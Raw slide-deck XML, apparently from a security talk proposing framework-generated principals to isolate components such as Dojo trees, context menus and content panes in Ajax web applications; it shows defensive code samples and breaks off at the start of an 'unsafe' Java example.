          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="2133600"/>
            <a:ext cx="1143000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6781800" y="2209800"/>
            <a:ext cx="1143000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="2286000"/>
            <a:ext cx="1143000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartConnecto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Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Rounded Rectangle 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7239000" y="2895600"/>
            <a:ext cx="1524000" cy="457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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>principal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(same as http-only)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7200" y="3429000"/>
            <a:ext cx="1725828" cy="3386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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>principal=(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>body)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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State of Web Application Security (Web 1.0)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229600" cy="462560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Web application vulnerabilities more common than ever before</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The usual suspects: code injection vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross site scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site request forgery (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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Make This the Default?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686800" cy="4625609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Manual principal specification: tedious and error-prone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Our solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Change the framework to generate new unique principals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Framework users get component isolation for free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Examples that follow use the Dojo Toolkit for constructing Ajax applications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Web Applications are Built Using Frameworks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AJAX.NET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dojo Toolkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prototype</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Script.aculo.us</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Yahoo! UI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Text box</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Text area</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Drop-down list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check-boxes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trees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Declaring a Isolated Content Pane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1600200"/>
            <a:ext cx="8229600" cy="1981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rgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;div</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1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</a:rPr>
              <a:t>id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>contentPane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dojoType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ContentPane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sizeMin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="20" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sizeShare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="80" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="Mail/MailAccount.html“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;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Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49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57200" y="5257800"/>
            <a:ext cx="8229600" cy="1295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rgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>principal=‘contentPane$1’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;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nsolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  ...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Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/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4267200" y="4114800"/>
            <a:ext cx="609600" cy="685800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Modern Ajax-based Web 2.0 applications often require </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fine-grained security guarantees</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Component isolation can be implemented as an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extension to the same-origin policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>of JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Frameworks provide a great opportunity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to inject safe programming defaults</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>“for free”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8077200" cy="2438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Safe Default # 3:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defaults for More Complex Widgets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3A9E-ED20-45ED-9568-A790BB115DEB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Widgets in Dojo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0" y="1775191"/>
            <a:ext cx="5791200" cy="462560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Context menu is a different widget </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>declared separately </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>from the tree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Isolation goals to accomplish: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sz="2000" dirty="0" smtClean="0"/>
              <a:t>To “Copy Inbox”, context menu has to have access to the tree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sz="2000" dirty="0" smtClean="0"/>
              <a:t>Inbox messages are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>given tree access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3425" y="1790700"/>
            <a:ext cx="2085975" cy="2476500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25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Curved Left Arrow 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="123825" y="1943100"/>
            <a:ext cx="1143000" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="curvedLeftArrow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Striped Right Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="723901" y="4381500"/>
            <a:ext cx="1447799" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="stripedRightArrow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0" name="Multiply 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="4648201"/>
            <a:ext cx="1752600" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply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Enforcing Dojo Tree Isolation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7200" y="3048000"/>
            <a:ext cx="8229600" cy="3429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>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>listenTree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(tree) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nodes = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tree.getDescendants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPlain" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> i = 0; i &lt; nodes.length; i++) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPlain" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (!nodes[i].isTreeNode) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPlain" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>continue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6        } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>7        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.bindDomNode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(nodes[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>labelNode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>8     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>9     ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.listenedTrees.push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(tree);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>11   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>12   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>this.setAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(’principal ’, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tree.getAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(’principal ’));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>13  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/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1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Must explicitly allow context menu to access the tree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Need to explicitly encode access control: set is as a property on object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Change framework functions to maintain it and check before allowing access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangular Callout 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="3733800"/>
            <a:ext cx="2438400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -87061"/>
              <a:gd name="adj2" fmla="val -1947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</a:rPr>
              <a:t>Connect context menu and tree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5" name="Rectangular Callout 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="4800600"/>
            <a:ext cx="3505200" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -18445"/>
              <a:gd name="adj2" fmla="val 9959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</a:rPr>
              <a:t>Give context menu the ability to access the underlying tree</a:t>
            </a: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is Unsafe!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85800" y="1647372"/>
            <a:ext cx="7696200" cy="11720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String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>req.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“username”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
